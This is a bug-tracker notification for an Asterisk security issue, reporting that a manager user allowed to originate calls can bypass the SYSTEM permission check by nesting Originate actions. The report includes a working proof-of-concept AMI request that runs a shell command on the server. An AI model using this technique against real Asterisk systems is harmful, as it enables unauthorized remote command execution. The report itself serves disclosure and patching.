[asterisk-bugs] [JIRA] (ASTERISK-28580) Bypass SYSTEM write permission in manager action allows system commands execution

[Asterisk Team (JIRA)]

     [ https://issues.asterisk.org/jira/browse/ASTERISK-28580?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Asterisk Team updated ASTERISK-28580:
-------------------------------------

    Target Release Version/s: 16.7.0

> Bypass SYSTEM write permission in manager action allows system commands execution
> ---------------------------------------------------------------------------------
>
>                 Key: ASTERISK-28580
>                 URL: https://issues.asterisk.org/jira/browse/ASTERISK-28580
>             Project: Asterisk
>          Issue Type: Security
>          Components: Core/ManagerInterface
>    Affects Versions: GIT
>            Reporter: Eliel Sardañons
>            Assignee: Unassigned
>            Severity: Blocker
>              Labels: patch, security
>      Target Release: 13.29.2, 13.30.0, 16.6.2, 16.7.0, 17.0.1
>
>         Attachments: 908eb49.diff
>
>
> it is possible to bypass the SYSTEM write permission in manager if the user is allowed to originate calls allowing remote code execution to the asterisk server.
> The current validation is found in this line of code https://github.com/asterisk/asterisk/blob/8aa4e1c3c99b58f072888ce8798623be227910c6/main/manager.c#L5735
> As you may notice all the validations are made on the application name so if we craft an action Originate with an Originate Application and end up running a SYSTEM application we can bypass this checks:
> Action: Originate
> Channel: Local/1111 at eliel
> Application: Originate
> Data: Local/2222 at eliel,app,System,touch /tmp/owned
> I tested it with a user with this permissions:
> read = call,log,verbose,agent,user,config,dtmf,reporting,cdr,dialplan
> write = call,agent,user,config,command,reporting,originate,message



--
This message was sent by Atlassian JIRA
(v6.2#6252)